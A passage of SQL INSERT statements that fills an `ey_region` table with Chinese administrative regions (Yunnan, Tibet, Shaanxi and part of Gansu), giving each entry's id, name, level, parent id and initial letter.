INSERT INTO `ey_region` VALUES ('40214', '宁蒗县', '3', '40160', 'N');
INSERT INTO `ey_region` VALUES ('40230', '思茅市', '2', '39556', 'S');
INSERT INTO `ey_region` VALUES ('40231', '市辖区', '3', '40230', 'S');
INSERT INTO `ey_region` VALUES ('40232', '翠云区', '3', '40230', 'C');
INSERT INTO `ey_region` VALUES ('40240', '普洱县', '3', '40230', 'P');
INSERT INTO `ey_region` VALUES ('40250', '墨江县', '3', '40230', 'M');
INSERT INTO `ey_region` VALUES ('40266', '景东县', '3', '40230', 'J');
INSERT INTO `ey_region` VALUES ('40280', '景谷县', '3', '40230', 'J');
INSERT INTO `ey_region` VALUES ('40291', '镇沅县', '3', '40230', 'Z');
INSERT INTO `ey_region` VALUES ('40301', '江城县', '3', '40230', 'J');
INSERT INTO `ey_region` VALUES ('40310', '孟连县', '3', '40230', 'M');
INSERT INTO `ey_region` VALUES ('40318', '澜沧县', '3', '40230', 'L');
INSERT INTO `ey_region` VALUES ('40340', '西盟县', '3', '40230', 'X');
INSERT INTO `ey_region` VALUES ('40348', '临沧市', '2', '39556', 'L');
INSERT INTO `ey_region` VALUES ('40349', '市辖区', '3', '40348', 'S');
INSERT INTO `ey_region` VALUES ('40350', '临翔区', '3', '40348', 'L');
INSERT INTO `ey_region` VALUES ('40361', '凤庆县', '3', '40348', 'F');
INSERT INTO `ey_region` VALUES ('40375', '云县', '3', '40348', 'Y');
INSERT INTO `ey_region` VALUES ('40388', '永德县', '3', '40348', 'Y');
INSERT INTO `ey_region` VALUES ('40400', '镇康县', '3', '40348', 'Z');
INSERT INTO `ey_region` VALUES ('40408', '双江县', '3', '40348', 'S');
INSERT INTO `ey_region` VALUES ('40417', '耿马县', '3', '40348', 'G');
INSERT INTO `ey_region` VALUES ('40429', '沧源县', '3', '40348', 'C');
INSERT INTO `ey_region` VALUES ('40441', '楚雄州', '2', '39556', 'C');
INSERT INTO `ey_region` VALUES ('40442', '楚雄市', '3', '40441', 'C');
INSERT INTO `ey_region` VALUES ('40458', '双柏县', '3', '40441', 'S');
INSERT INTO `ey_region` VALUES ('40467', '牟定县', '3', '40441', 'M');
INSERT INTO `ey_region` VALUES ('40475', '南华县', '3', '40441', 'N');
INSERT INTO `ey_region` VALUES ('40486', '姚安县', '3', '40441', 'Y');
INSERT INTO `ey_region` VALUES ('40496', '大姚县', '3', '40441', 'D');
INSERT INTO `ey_region` VALUES ('40509', '永仁县', '3', '40441', 'Y');
INSERT INTO `ey_region` VALUES ('40517', '元谋县', '3', '40441', 'Y');
INSERT INTO `ey_region` VALUES ('40528', '武定县', '3', '40441', 'W');
INSERT INTO `ey_region` VALUES ('40540', '禄丰县', '3', '40441', 'L');
INSERT INTO `ey_region` VALUES ('40555', '红河州', '2', '39556', 'H');
INSERT INTO `ey_region` VALUES ('40556', '个旧市', '3', '40555', 'G');
INSERT INTO `ey_region` VALUES ('40567', '开远市', '3', '40555', 'K');
INSERT INTO `ey_region` VALUES ('40576', '蒙自县', '3', '40555', 'M');
INSERT INTO `ey_region` VALUES ('40588', '屏边县', '3', '40555', 'P');
INSERT INTO `ey_region` VALUES ('40596', '建水县', '3', '40555', 'J');
INSERT INTO `ey_region` VALUES ('40611', '石屏县', '3', '40555', 'S');
INSERT INTO `ey_region` VALUES ('40621', '弥勒县', '3', '40555', 'M');
INSERT INTO `ey_region` VALUES ('40635', '泸西县', '3', '40555', 'L');
INSERT INTO `ey_region` VALUES ('40644', '元阳县', '3', '40555', 'Y');
INSERT INTO `ey_region` VALUES ('40659', '红河县', '3', '40555', 'H');
INSERT INTO `ey_region` VALUES ('40673', '金平县', '3', '40555', 'J');
INSERT INTO `ey_region` VALUES ('40688', '绿春县', '3', '40555', 'L');
INSERT INTO `ey_region` VALUES ('40698', '河口县', '3', '40555', 'H');
INSERT INTO `ey_region` VALUES ('40705', '文山州', '2', '39556', 'W');
INSERT INTO `ey_region` VALUES ('40706', '文山县', '3', '40705', 'W');
INSERT INTO `ey_region` VALUES ('40722', '砚山县', '3', '40705', 'Y');
INSERT INTO `ey_region` VALUES ('40734', '西畴县', '3', '40705', 'X');
INSERT INTO `ey_region` VALUES ('40744', '麻栗坡县', '3', '40705', 'M');
INSERT INTO `ey_region` VALUES ('40756', '马关县', '3', '40705', 'M');
INSERT INTO `ey_region` VALUES ('40770', '丘北县', '3', '40705', 'Q');
INSERT INTO `ey_region` VALUES ('40783', '广南县', '3', '40705', 'G');
INSERT INTO `ey_region` VALUES ('40802', '富宁县', '3', '40705', 'F');
INSERT INTO `ey_region` VALUES ('40816', '西双版纳州', '2', '39556', 'X');
INSERT INTO `ey_region` VALUES ('40817', '景洪市', '3', '40816', 'J');
INSERT INTO `ey_region` VALUES ('40829', '勐海县', '3', '40816', 'M');
INSERT INTO `ey_region` VALUES ('40841', '勐腊县', '3', '40816', 'M');
INSERT INTO `ey_region` VALUES ('40852', '大理州', '2', '39556', 'D');
INSERT INTO `ey_region` VALUES ('40853', '大理市', '3', '40852', 'D');
INSERT INTO `ey_region` VALUES ('40866', '漾濞县', '3', '40852', 'Y');
INSERT INTO `ey_region` VALUES ('40876', '祥云县', '3', '40852', 'X');
INSERT INTO `ey_region` VALUES ('40887', '宾川县', '3', '40852', 'B');
INSERT INTO `ey_region` VALUES ('40901', '弥渡县', '3', '40852', 'M');
INSERT INTO `ey_region` VALUES ('40910', '南涧县', '3', '40852', 'N');
INSERT INTO `ey_region` VALUES ('40919', '巍山县', '3', '40852', 'W');
INSERT INTO `ey_region` VALUES ('40930', '永平县', '3', '40852', 'Y');
INSERT INTO `ey_region` VALUES ('40938', '云龙县', '3', '40852', 'Y');
INSERT INTO `ey_region` VALUES ('40950', '洱源县', '3', '40852', 'E');
INSERT INTO `ey_region` VALUES ('40960', '剑川县', '3', '40852', 'J');
INSERT INTO `ey_region` VALUES ('40969', '鹤庆县', '3', '40852', 'H');
INSERT INTO `ey_region` VALUES ('40979', '德宏州', '2', '39556', 'D');
INSERT INTO `ey_region` VALUES ('40980', '瑞丽市', '3', '40979', 'R');
INSERT INTO `ey_region` VALUES ('40988', '潞西市', '3', '40979', 'L');
INSERT INTO `ey_region` VALUES ('41000', '梁河县', '3', '40979', 'L');
INSERT INTO `ey_region` VALUES ('41010', '盈江县', '3', '40979', 'Y');
INSERT INTO `ey_region` VALUES ('41026', '陇川县', '3', '40979', 'L');
INSERT INTO `ey_region` VALUES ('41036', '怒江州', '2', '39556', 'N');
INSERT INTO `ey_region` VALUES ('41037', '泸水县', '3', '41036', 'L');
INSERT INTO `ey_region` VALUES ('41047', '福贡县', '3', '41036', 'F');
INSERT INTO `ey_region` VALUES ('41055', '贡山县', '3', '41036', 'G');
INSERT INTO `ey_region` VALUES ('41061', '兰坪县', '3', '41036', 'L');
INSERT INTO `ey_region` VALUES ('41070', '迪庆州', '2', '39556', 'D');
INSERT INTO `ey_region` VALUES ('41071', '香格里拉县', '3', '41070', 'X');
INSERT INTO `ey_region` VALUES ('41083', '德钦县', '3', '41070', 'D');
INSERT INTO `ey_region` VALUES ('41092', '维西县', '3', '41070', 'W');
INSERT INTO `ey_region` VALUES ('41103', '西藏自治区', '1', '0', 'X');
INSERT INTO `ey_region` VALUES ('41104', '拉萨市', '2', '41103', 'L');
INSERT INTO `ey_region` VALUES ('41105', '市辖区', '3', '41104', 'S');
INSERT INTO `ey_region` VALUES ('41106', '城关区', '3', '41104', 'C');
INSERT INTO `ey_region` VALUES ('41118', '林周县', '3', '41104', 'L');
INSERT INTO `ey_region` VALUES ('41129', '当雄县', '3', '41104', 'D');
INSERT INTO `ey_region` VALUES ('41138', '尼木县', '3', '41104', 'N');
INSERT INTO `ey_region` VALUES ('41147', '曲水县', '3', '41104', 'Q');
INSERT INTO `ey_region` VALUES ('41154', '堆龙德庆', '3', '41104', 'D');
INSERT INTO `ey_region` VALUES ('41162', '达孜县', '3', '41104', 'D');
INSERT INTO `ey_region` VALUES ('41169', '墨竹工卡县', '3', '41104', 'M');
INSERT INTO `ey_region` VALUES ('41178', '昌都地区', '2', '41103', 'C');
INSERT INTO `ey_region` VALUES ('41179', '昌都县', '3', '41178', 'C');
INSERT INTO `ey_region` VALUES ('41195', '江达县', '3', '41178', 'J');
INSERT INTO `ey_region` VALUES ('41209', '贡觉县', '3', '41178', 'G');
INSERT INTO `ey_region` VALUES ('41222', '类乌齐县', '3', '41178', 'L');
INSERT INTO `ey_region` VALUES ('41233', '丁青县', '3', '41178', 'D');
INSERT INTO `ey_region` VALUES ('41247', '察亚县', '3', '41178', 'C');
INSERT INTO `ey_region` VALUES ('41261', '八宿县', '3', '41178', 'B');
INSERT INTO `ey_region` VALUES ('41276', '左贡县', '3', '41178', 'Z');
INSERT INTO `ey_region` VALUES ('41287', '芒康县', '3', '41178', 'M');
INSERT INTO `ey_region` VALUES ('41304', '洛隆县', '3', '41178', 'L');
INSERT INTO `ey_region` VALUES ('41316', '边坝县', '3', '41178', 'B');
INSERT INTO `ey_region` VALUES ('41328', '山南地区', '2', '41103', 'S');
INSERT INTO `ey_region` VALUES ('41329', '乃东县', '3', '41328', 'N');
INSERT INTO `ey_region` VALUES ('41337', '扎囊县', '3', '41328', 'Z');
INSERT INTO `ey_region` VALUES ('41343', '贡嘎县', '3', '41328', 'G');
INSERT INTO `ey_region` VALUES ('41352', '桑日县', '3', '41328', 'S');
INSERT INTO `ey_region` VALUES ('41357', '琼结县', '3', '41328', 'Q');
INSERT INTO `ey_region` VALUES ('41362', '曲松县', '3', '41328', 'Q');
INSERT INTO `ey_region` VALUES ('41368', '措美县', '3', '41328', 'C');
INSERT INTO `ey_region` VALUES ('41373', '洛扎县', '3', '41328', 'L');
INSERT INTO `ey_region` VALUES ('41381', '加查县', '3', '41328', 'J');
INSERT INTO `ey_region` VALUES ('41389', '隆子县', '3', '41328', 'L');
INSERT INTO `ey_region` VALUES ('41401', '错那县', '3', '41328', 'C');
INSERT INTO `ey_region` VALUES ('41412', '浪卡子县', '3', '41328', 'L');
INSERT INTO `ey_region` VALUES ('41423', '日喀则地区', '2', '41103', 'R');
INSERT INTO `ey_region` VALUES ('41424', '日喀则市', '3', '41423', 'R');
INSERT INTO `ey_region` VALUES ('41437', '南木林县', '3', '41423', 'N');
INSERT INTO `ey_region` VALUES ('41455', '江孜县', '3', '41423', 'J');
INSERT INTO `ey_region` VALUES ('41475', '定日县', '3', '41423', 'D');
INSERT INTO `ey_region` VALUES ('41489', '萨迦县', '3', '41423', 'S');
INSERT INTO `ey_region` VALUES ('41501', '拉孜县', '3', '41423', 'L');
INSERT INTO `ey_region` VALUES ('41513', '昂仁县', '3', '41423', 'A');
INSERT INTO `ey_region` VALUES ('41531', '谢通门县', '3', '41423', 'X');
INSERT INTO `ey_region` VALUES ('41551', '白朗县', '3', '41423', 'B');
INSERT INTO `ey_region` VALUES ('41563', '仁布县', '3', '41423', 'R');
INSERT INTO `ey_region` VALUES ('41573', '康马县', '3', '41423', 'K');
INSERT INTO `ey_region` VALUES ('41583', '定结县', '3', '41423', 'D');
INSERT INTO `ey_region` VALUES ('41594', '仲巴县', '3', '41423', 'Z');
INSERT INTO `ey_region` VALUES ('41608', '亚东县', '3', '41423', 'Y');
INSERT INTO `ey_region` VALUES ('41616', '吉隆县', '3', '41423', 'J');
INSERT INTO `ey_region` VALUES ('41622', '聂拉木县', '3', '41423', 'N');
INSERT INTO `ey_region` VALUES ('41630', '萨嘎县', '3', '41423', 'S');
INSERT INTO `ey_region` VALUES ('41639', '岗巴县', '3', '41423', 'G');
INSERT INTO `ey_region` VALUES ('41645', '那曲地区', '2', '41103', 'N');
INSERT INTO `ey_region` VALUES ('41646', '那曲县', '3', '41645', 'N');
INSERT INTO `ey_region` VALUES ('41659', '嘉黎县', '3', '41645', 'J');
INSERT INTO `ey_region` VALUES ('41670', '比如县', '3', '41645', 'B');
INSERT INTO `ey_region` VALUES ('41681', '聂荣县', '3', '41645', 'N');
INSERT INTO `ey_region` VALUES ('41692', '安多县', '3', '41645', 'A');
INSERT INTO `ey_region` VALUES ('41706', '申扎县', '3', '41645', 'S');
INSERT INTO `ey_region` VALUES ('41715', '索县', '3', '41645', 'S');
INSERT INTO `ey_region` VALUES ('41726', '班戈县', '3', '41645', 'B');
INSERT INTO `ey_region` VALUES ('41737', '巴青县', '3', '41645', 'B');
INSERT INTO `ey_region` VALUES ('41748', '尼玛县', '3', '41645', 'N');
INSERT INTO `ey_region` VALUES ('41770', '阿里地区', '2', '41103', 'A');
INSERT INTO `ey_region` VALUES ('41771', '普兰县', '3', '41770', 'P');
INSERT INTO `ey_region` VALUES ('41775', '札达县', '3', '41770', 'Z');
INSERT INTO `ey_region` VALUES ('41782', '噶尔县', '3', '41770', 'G');
INSERT INTO `ey_region` VALUES ('41788', '日土县', '3', '41770', 'R');
INSERT INTO `ey_region` VALUES ('41794', '革吉县', '3', '41770', 'G');
INSERT INTO `ey_region` VALUES ('41800', '改则县', '3', '41770', 'G');
INSERT INTO `ey_region` VALUES ('41808', '措勤县', '3', '41770', 'C');
INSERT INTO `ey_region` VALUES ('41814', '林芝地区', '2', '41103', 'L');
INSERT INTO `ey_region` VALUES ('41815', '林芝县', '3', '41814', 'L');
INSERT INTO `ey_region` VALUES ('41823', '工布江达县', '3', '41814', 'G');
INSERT INTO `ey_region` VALUES ('41833', '米林县', '3', '41814', 'M');
INSERT INTO `ey_region` VALUES ('41842', '墨脱县', '3', '41814', 'M');
INSERT INTO `ey_region` VALUES ('41851', '波密县', '3', '41814', 'B');
INSERT INTO `ey_region` VALUES ('41863', '察隅县', '3', '41814', 'C');
INSERT INTO `ey_region` VALUES ('41870', '朗县', '3', '41814', 'L');
INSERT INTO `ey_region` VALUES ('41877', '陕西省', '1', '0', 'S');
INSERT INTO `ey_region` VALUES ('41878', '西安市', '2', '41877', 'X');
INSERT INTO `ey_region` VALUES ('41879', '市辖区', '3', '41878', 'S');
INSERT INTO `ey_region` VALUES ('41880', '新城区', '3', '41878', 'X');
INSERT INTO `ey_region` VALUES ('41890', '碑林区', '3', '41878', 'B');
INSERT INTO `ey_region` VALUES ('41899', '莲湖区', '3', '41878', 'L');
INSERT INTO `ey_region` VALUES ('41909', '灞桥区', '3', '41878', 'B');
INSERT INTO `ey_region` VALUES ('41919', '未央区', '3', '41878', 'W');
INSERT INTO `ey_region` VALUES ('41930', '雁塔区', '3', '41878', 'Y');
INSERT INTO `ey_region` VALUES ('41939', '阎良区', '3', '41878', 'Y');
INSERT INTO `ey_region` VALUES ('41947', '临潼区', '3', '41878', 'L');
INSERT INTO `ey_region` VALUES ('41971', '长安区', '3', '41878', 'C');
INSERT INTO `ey_region` VALUES ('41997', '蓝田县', '3', '41878', 'L');
INSERT INTO `ey_region` VALUES ('42020', '周至县', '3', '41878', 'Z');
INSERT INTO `ey_region` VALUES ('42043', '户县', '3', '41878', 'H');
INSERT INTO `ey_region` VALUES ('42060', '高陵县', '3', '41878', 'G');
INSERT INTO `ey_region` VALUES ('42069', '铜川市', '2', '41877', 'T');
INSERT INTO `ey_region` VALUES ('42070', '市辖区', '3', '42069', 'S');
INSERT INTO `ey_region` VALUES ('42071', '王益区', '3', '42069', 'W');
INSERT INTO `ey_region` VALUES ('42079', '印台区', '3', '42069', 'Y');
INSERT INTO `ey_region` VALUES ('42091', '耀州区', '3', '42069', 'Y');
INSERT INTO `ey_region` VALUES ('42108', '宜君县', '3', '42069', 'Y');
INSERT INTO `ey_region` VALUES ('42119', '宝鸡市', '2', '41877', 'B');
INSERT INTO `ey_region` VALUES ('42120', '市辖区', '3', '42119', 'S');
INSERT INTO `ey_region` VALUES ('42121', '渭滨区', '3', '42119', 'W');
INSERT INTO `ey_region` VALUES ('42133', '金台区', '3', '42119', 'J');
INSERT INTO `ey_region` VALUES ('42146', '陈仓区', '3', '42119', 'C');
INSERT INTO `ey_region` VALUES ('42165', '凤翔县', '3', '42119', 'F');
INSERT INTO `ey_region` VALUES ('42183', '岐山县', '3', '42119', 'Q');
INSERT INTO `ey_region` VALUES ('42198', '扶风县', '3', '42119', 'F');
INSERT INTO `ey_region` VALUES ('42211', '眉县', '3', '42119', 'M');
INSERT INTO `ey_region` VALUES ('42224', '陇县', '3', '42119', 'L');
INSERT INTO `ey_region` VALUES ('42240', '千阳县', '3', '42119', 'Q');
INSERT INTO `ey_region` VALUES ('42252', '麟游县', '3', '42119', 'L');
INSERT INTO `ey_region` VALUES ('42263', '凤县', '3', '42119', 'F');
INSERT INTO `ey_region` VALUES ('42278', '太白县', '3', '42119', 'T');
INSERT INTO `ey_region` VALUES ('42287', '咸阳市', '2', '41877', 'X');
INSERT INTO `ey_region` VALUES ('42288', '市辖区', '3', '42287', 'S');
INSERT INTO `ey_region` VALUES ('42289', '秦都区', '3', '42287', 'Q');
INSERT INTO `ey_region` VALUES ('42302', '杨凌区', '3', '42287', 'Y');
INSERT INTO `ey_region` VALUES ('42308', '渭城区', '3', '42287', 'W');
INSERT INTO `ey_region` VALUES ('42319', '三原县', '3', '42287', 'S');
INSERT INTO `ey_region` VALUES ('42334', '泾阳县', '3', '42287', 'J');
INSERT INTO `ey_region` VALUES ('42351', '乾县', '3', '42287', 'Q');
INSERT INTO `ey_region` VALUES ('42372', '礼泉县', '3', '42287', 'L');
INSERT INTO `ey_region` VALUES ('42388', '永寿县', '3', '42287', 'Y');
INSERT INTO `ey_region` VALUES ('42402', '彬县', '3', '42287', 'B');
INSERT INTO `ey_region` VALUES ('42419', '长武县', '3', '42287', 'C');
INSERT INTO `ey_region` VALUES ('42431', '旬邑县', '3', '42287', 'X');
INSERT INTO `ey_region` VALUES ('42446', '淳化县', '3', '42287', 'C');
INSERT INTO `ey_region` VALUES ('42462', '武功县', '3', '42287', 'W');
INSERT INTO `ey_region` VALUES ('42475', '兴平市', '3', '42287', 'X');
INSERT INTO `ey_region` VALUES ('42490', '渭南市', '2', '41877', 'W');
INSERT INTO `ey_region` VALUES ('42491', '市辖区', '3', '42490', 'S');
INSERT INTO `ey_region` VALUES ('42492', '临渭区', '3', '42490', 'L');
INSERT INTO `ey_region` VALUES ('42523', '华县', '3', '42490', 'H');
INSERT INTO `ey_region` VALUES ('42538', '潼关县', '3', '42490', 'T');
INSERT INTO `ey_region` VALUES ('42547', '大荔县', '3', '42490', 'D');
INSERT INTO `ey_region` VALUES ('42577', '合阳县', '3', '42490', 'H');
INSERT INTO `ey_region` VALUES ('42594', '澄城县', '3', '42490', 'C');
INSERT INTO `ey_region` VALUES ('42609', '蒲城县', '3', '42490', 'P');
INSERT INTO `ey_region` VALUES ('42634', '白水县', '3', '42490', 'B');
INSERT INTO `ey_region` VALUES ('42649', '富平县', '3', '42490', 'F');
INSERT INTO `ey_region` VALUES ('42674', '韩城市', '3', '42490', 'H');
INSERT INTO `ey_region` VALUES ('42691', '华阴市', '3', '42490', 'H');
INSERT INTO `ey_region` VALUES ('42703', '延安市', '2', '41877', 'Y');
INSERT INTO `ey_region` VALUES ('42704', '市辖区', '3', '42703', 'S');
INSERT INTO `ey_region` VALUES ('42705', '宝塔区', '3', '42703', 'B');
INSERT INTO `ey_region` VALUES ('42729', '延长县', '3', '42703', 'Y');
INSERT INTO `ey_region` VALUES ('42742', '延川县', '3', '42703', 'Y');
INSERT INTO `ey_region` VALUES ('42757', '子长县', '3', '42703', 'Z');
INSERT INTO `ey_region` VALUES ('42771', '安塞县', '3', '42703', 'A');
INSERT INTO `ey_region` VALUES ('42784', '志丹县', '3', '42703', 'Z');
INSERT INTO `ey_region` VALUES ('42796', '吴起县', '3', '42703', 'W');
INSERT INTO `ey_region` VALUES ('42809', '甘泉县', '3', '42703', 'G');
INSERT INTO `ey_region` VALUES ('42818', '富县', '3', '42703', 'F');
INSERT INTO `ey_region` VALUES ('42833', '洛川县', '3', '42703', 'L');
INSERT INTO `ey_region` VALUES ('42850', '宜川县', '3', '42703', 'Y');
INSERT INTO `ey_region` VALUES ('42863', '黄龙县', '3', '42703', 'H');
INSERT INTO `ey_region` VALUES ('42874', '黄陵县', '3', '42703', 'H');
INSERT INTO `ey_region` VALUES ('42888', '汉中市', '2', '41877', 'H');
INSERT INTO `ey_region` VALUES ('42889', '市辖区', '3', '42888', 'S');
INSERT INTO `ey_region` VALUES ('42890', '汉台区', '3', '42888', 'H');
INSERT INTO `ey_region` VALUES ('42908', '南郑县', '3', '42888', 'N');
INSERT INTO `ey_region` VALUES ('42939', '城固县', '3', '42888', 'C');
INSERT INTO `ey_region` VALUES ('42965', '洋县', '3', '42888', 'Y');
INSERT INTO `ey_region` VALUES ('42992', '西乡县', '3', '42888', 'X');
INSERT INTO `ey_region` VALUES ('43016', '勉县', '3', '42888', 'M');
INSERT INTO `ey_region` VALUES ('43042', '宁强县', '3', '42888', 'N');
INSERT INTO `ey_region` VALUES ('43069', '略阳县', '3', '42888', 'L');
INSERT INTO `ey_region` VALUES ('43091', '镇巴县', '3', '42888', 'Z');
INSERT INTO `ey_region` VALUES ('43116', '留坝县', '3', '42888', 'L');
INSERT INTO `ey_region` VALUES ('43126', '佛坪县', '3', '42888', 'F');
INSERT INTO `ey_region` VALUES ('43136', '榆林市', '2', '41877', 'Y');
INSERT INTO `ey_region` VALUES ('43137', '市辖区', '3', '43136', 'S');
INSERT INTO `ey_region` VALUES ('43138', '榆阳区', '3', '43136', 'Y');
INSERT INTO `ey_region` VALUES ('43170', '神木县', '3', '43136', 'S');
INSERT INTO `ey_region` VALUES ('43190', '府谷县', '3', '43136', 'F');
INSERT INTO `ey_region` VALUES ('43211', '横山县', '3', '43136', 'H');
INSERT INTO `ey_region` VALUES ('43230', '靖边县', '3', '43136', 'J');
INSERT INTO `ey_region` VALUES ('43253', '定边县', '3', '43136', 'D');
INSERT INTO `ey_region` VALUES ('43279', '绥德县', '3', '43136', 'S');
INSERT INTO `ey_region` VALUES ('43300', '米脂县', '3', '43136', 'M');
INSERT INTO `ey_region` VALUES ('43314', '佳县', '3', '43136', 'J');
INSERT INTO `ey_region` VALUES ('43335', '吴堡县', '3', '43136', 'W');
INSERT INTO `ey_region` VALUES ('43344', '清涧县', '3', '43136', 'Q');
INSERT INTO `ey_region` VALUES ('43360', '子洲县', '3', '43136', 'Z');
INSERT INTO `ey_region` VALUES ('43379', '安康市', '2', '41877', 'A');
INSERT INTO `ey_region` VALUES ('43380', '市辖区', '3', '43379', 'S');
INSERT INTO `ey_region` VALUES ('43381', '汉滨区', '3', '43379', 'H');
INSERT INTO `ey_region` VALUES ('43428', '汉阴县', '3', '43379', 'H');
INSERT INTO `ey_region` VALUES ('43447', '石泉县', '3', '43379', 'S');
INSERT INTO `ey_region` VALUES ('43463', '宁陕县', '3', '43379', 'N');
INSERT INTO `ey_region` VALUES ('43478', '紫阳县', '3', '43379', 'Z');
INSERT INTO `ey_region` VALUES ('43504', '岚皋县', '3', '43379', 'L');
INSERT INTO `ey_region` VALUES ('43522', '平利县', '3', '43379', 'P');
INSERT INTO `ey_region` VALUES ('43535', '镇坪县', '3', '43379', 'Z');
INSERT INTO `ey_region` VALUES ('43546', '旬阳县', '3', '43379', 'X');
INSERT INTO `ey_region` VALUES ('43575', '白河县', '3', '43379', 'B');
INSERT INTO `ey_region` VALUES ('43592', '商洛市', '2', '41877', 'S');
INSERT INTO `ey_region` VALUES ('43593', '市辖区', '3', '43592', 'S');
INSERT INTO `ey_region` VALUES ('43594', '商州区', '3', '43592', 'S');
INSERT INTO `ey_region` VALUES ('43628', '洛南县', '3', '43592', 'L');
INSERT INTO `ey_region` VALUES ('43654', '丹凤县', '3', '43592', 'D');
INSERT INTO `ey_region` VALUES ('43676', '商南县', '3', '43592', 'S');
INSERT INTO `ey_region` VALUES ('43699', '山阳县', '3', '43592', 'S');
INSERT INTO `ey_region` VALUES ('43730', '镇安县', '3', '43592', 'Z');
INSERT INTO `ey_region` VALUES ('43759', '柞水县', '3', '43592', 'Z');
INSERT INTO `ey_region` VALUES ('43776', '甘肃省', '1', '0', 'G');
INSERT INTO `ey_region` VALUES ('43777', '兰州市', '2', '43776', 'L');
INSERT INTO `ey_region` VALUES ('43778', '市辖区', '3', '43777', 'S');
INSERT INTO `ey_region` VALUES ('43779', '城关区', '3', '43777', 'C');
INSERT INTO `ey_region` VALUES ('43804', '七里河区', '3', '43777', 'Q');
INSERT INTO `ey_region` VALUES ('43820', '兰州市西固区', '3', '43777', 'L');
INSERT INTO `ey_region` VALUES ('43836', '安宁区', '3', '43777', 'A');
INSERT INTO `ey_region` VALUES ('43845', '红古区', '3', '43777', 'H');
INSERT INTO `ey_region` VALUES ('43853', '永登县', '3', '43777', 'Y');
INSERT INTO `ey_region` VALUES ('43872', '皋兰县', '3', '43777', 'G');
INSERT INTO `ey_region` VALUES ('43880', '榆中县', '3', '43777', 'Y');
INSERT INTO `ey_region` VALUES ('43904', '嘉峪关市', '2', '43776', 'J');
INSERT INTO `ey_region` VALUES ('43905', '市辖', '3', '43904', 'S');
INSERT INTO `ey_region` VALUES ('43914', '金昌市', '2', '43776', 'J');
INSERT INTO `ey_region` VALUES ('43915', '市辖区', '3', '43914', 'S');
INSERT INTO `ey_region` VALUES ('43916', '金川区', '3', '43914', 'J');
INSERT INTO `ey_region` VALUES ('43925', '永昌县', '3', '43914', 'Y');
INSERT INTO `ey_region` VALUES ('43936', '白银市', '2', '43776', 'B');
INSERT INTO `ey_region` VALUES ('43937', '市辖区', '3', '43936', 'S');
INSERT INTO `ey_region` VALUES ('43938', '白银区', '3', '43936', 'B');
INSERT INTO `ey_region` VALUES ('43949', '平川区', '3', '43936', 'P');
INSERT INTO `ey_region` VALUES ('43961', '靖远县', '3', '43936', 'J');
INSERT INTO `ey_region` VALUES ('43980', '会宁县', '3', '43936', 'H');
INSERT INTO `ey_region` VALUES ('44009', '景泰县', '3', '43936', 'J');
INSERT INTO `ey_region` VALUES ('44022', '天水市', '2', '43776', 'T');
INSERT INTO `ey_region` VALUES ('44023', '市辖区', '3', '44022', 'S');
INSERT INTO `ey_region` VALUES ('44024', '秦州区', '3', '44022', 'Q');
INSERT INTO `ey_region` VALUES ('44048', '麦积区', '3', '44022', 'M');
INSERT INTO `ey_region` VALUES ('44069', '清水县', '3', '44022', 'Q');
INSERT INTO `ey_region` VALUES ('44088', '秦安县', '3', '44022', 'Q');
INSERT INTO `ey_region` VALUES ('44106', '甘谷县', '3', '44022', 'G');
INSERT INTO `ey_region` VALUES ('44122', '武山县', '3', '44022', 'W');
INSERT INTO `ey_region` VALUES ('44138', '张家川县', '3', '44022', 'Z');
INSERT INTO `ey_region` VALUES ('44154', '武威市', '2', '43776', 'W');
INSERT INTO `ey_region` VALUES ('44155', '市辖区', '3', '44154', 'S');
INSERT INTO `ey_region` VALUES ('44156', '凉州区', '3', '44154', 'L');
INSERT INTO `ey_region` VALUES ('44202', '民勤县', '3', '44154', 'M');
INSERT INTO `ey_region` VALUES ('44221', '古浪县', '3', '44154', 'G');
INSERT INTO `ey_region` VALUES ('44242', '天祝县', '3', '44154', 'T');
INSERT INTO `ey_region` VALUES ('44265', '张掖市', '2', '43776', 'Z');
INSERT INTO `ey_region` VALUES ('44266', '市辖区', '3', '44265', 'S');
INSERT INTO `ey_region` VALUES ('44267', '甘州区', '3', '44265', 'G');
INSERT INTO `ey_region` VALUES ('44294', '肃南县', '3', '44265', 'S');
INSERT INTO `ey_region` VALUES ('44305', '民乐县', '3', '44265', 'M');
INSERT INTO `ey_region` VALUES ('44317', '临泽县', '3', '44265', 'L');
INSERT INTO `ey_region` VALUES ('44331', '高台县', '3', '44265', 'G');
INSERT INTO `ey_region` VALUES ('44341', '山丹县', '3', '44265', 'S');
INSERT INTO `ey_region` VALUES ('44352', '平凉市', '2', '43776', 'P');
INSERT INTO `ey_region` VALUES ('44353', '市辖区', '3', '44352', 'S');
INSERT INTO `ey_region` VALUES ('44354', '崆峒区', '3', '44352', 'K');
INSERT INTO `ey_region` VALUES ('44375', '泾川县', '3', '44352', 'J');
INSERT INTO `ey_region` VALUES ('44392', '灵台县', '3', '44352', 'L');
INSERT INTO `ey_region` VALUES ('44408', '崇信县', '3', '44352', 'C');
INSERT INTO `ey_region` VALUES ('44418', '华亭县', '3', '44352', 'H');
INSERT INTO `ey_region` VALUES ('44431', '庄浪县', '3', '44352', 'Z');
INSERT INTO `ey_region` VALUES ('44451', '静宁县', '3', '44352', 'J');
INSERT INTO `ey_region` VALUES ('44477', '酒泉市', '2', '43776', 'J');
INSERT INTO `ey_region` VALUES ('44478', '市辖区', '3', '44477', 'S');
INSERT INTO `ey_region` VALUES ('44479', '肃州区', '3', '44477', 'S');
INSERT INTO `ey_region` VALUES ('44504', '金塔县', '3', '44477', 'J');
INSERT INTO `ey_region` VALUES ('44516', '瓜州县', '3', '44477', 'G');
INSERT INTO `ey_region` VALUES ('44531', '肃北县', '3', '44477', 'S');
INSERT INTO `ey_region` VALUES ('44535', '阿克塞县', '3', '44477', 'A');
INSERT INTO `ey_region` VALUES ('44539', '玉门市', '3', '44477', 'Y');
INSERT INTO `ey_region` VALUES ('44557', '敦煌市', '3', '44477', 'D');
INSERT INTO `ey_region` VALUES ('44569', '庆阳市', '2', '43776', 'Q');
INSERT INTO `ey_region` VALUES ('44570', '市辖区', '3', '44569', 'S');
INSERT INTO `ey_region` VALUES ('44571', '西峰区', '3', '44569', 'X');
INSERT INTO `ey_region` VALUES ('44582', '庆城县', '3', '44569', 'Q');
INSERT INTO `ey_region` VALUES ('44598', '环县', '3', '44569', 'H');
INSERT INTO `ey_region` VALUES ('44620', '华池县', '3', '44569', 'H');
INSERT INTO `ey_region` VALUES ('44636', '合水县', '3', '44569', 'H');
INSERT INTO `ey_region` VALUES ('44649', '正宁县', '3', '44569', 'Z');
INSERT INTO `ey_region` VALUES ('44660', '宁县', '3', '44569', 'N');
